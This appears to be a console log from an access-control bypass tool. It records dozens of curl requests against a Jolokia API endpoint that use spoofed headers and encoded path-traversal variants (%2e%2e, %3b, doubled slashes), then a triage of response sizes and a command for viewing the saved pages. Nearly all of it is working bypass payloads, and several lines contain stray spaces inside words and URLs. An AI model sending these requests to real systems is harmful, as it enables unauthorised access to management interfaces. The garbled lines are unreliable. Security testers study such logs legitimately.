2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 0.0.0.0' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 127.0.0.1' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: localhost' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: norealhost' 'http://thinkloveshare.com/api/jolokia/list'
[...]
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%252f%252f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%26//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e//list 2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Curren t: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%20%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w ' \nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'ht tp://thinkloveshare.com//api/jolokia//%3b/%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e%2e/..%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2f%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolo kia//%3b%09//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e%2f%2e%2e%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl - sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%3f//list'
2022-05-10 15:54:09 work bup[738125] WARNING Stage: save_and_quit
2022-05-10 15:54:10 work bup[738125] INFO Saving html pages and short output in: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:10 work bup[738125] INFO Triaged results shows the following distinct pages:
9: 41 - 850a2bd214c68f582aaac1c84c702b5d.html
10: 97 - 219145da181c48fea603aab3097d8201.html
10: 99 - 309b8397d07f618ec07541c418979a84.html
10: 100 - 9a1304f66bfee2130b34258635d50171.html
10: 108 - b61052875693afa4b86d39321d4170b4.html
10: 109 - 6fb5c59f5c29d23e407d6f041523a2bb.html
11: 101 - 045d36e3cfba7f6cbb7e657fc6cf1125.html
12:43116 - 9787a734c56b37f7bf5d78aaee43c55d.html
1 6: 41 - c5663aedf1036c950a5d83bd83c8e4e7.html
21: 156 - 7857d3d4a9bc8bf69278bf43c4918909.html
22: 107 - 011ca570bdf2e5babcf4f99c4cd84126.html
22: 109 - 6d4b61258386f744a388d402a5f11d03.html
22: 110 - 2f26cd3ba49e023dbda4453e5fd89431.html
76: 821 - bfe5f92861f949e44b355ee22574194a.html
2022-05-10 15:54:10 work bup[738125] INFO Also, inspect them manually with batcat:
echo /tmp/tmp48drf_ie-bypass-url-parser/{850a2bd214c68f582aaac1c84c702b5d.html,219145da181c48fea603aab3097d8201.html,309b8397d07f618ec07541c418979a84.html,9a1304f66bfee2130b34258635d50171.html,b61052875693afa4b86d39321d4170b4.html,6fb5c59f5c29d23e407d6f041523a2bb.html,045d36e3cfba7f6cbb7e657fc6cf1125.html,9787a734c56b37f7bf5d78aaee43c55d.html,c5663aedf1036c950a5d83bd83c8e4e7.html,7857d3d4a9bc8bf69278bf43c4918909.html,011ca570bdf2e5babcf4f99c4cd84126.html,6d4b61258386f744a388d402a5f11d03.html,2f26cd3ba49e023dbda4453e5fd89431.html,bfe5f92861f949e44b355ee22574194a.html} | xa rgs bat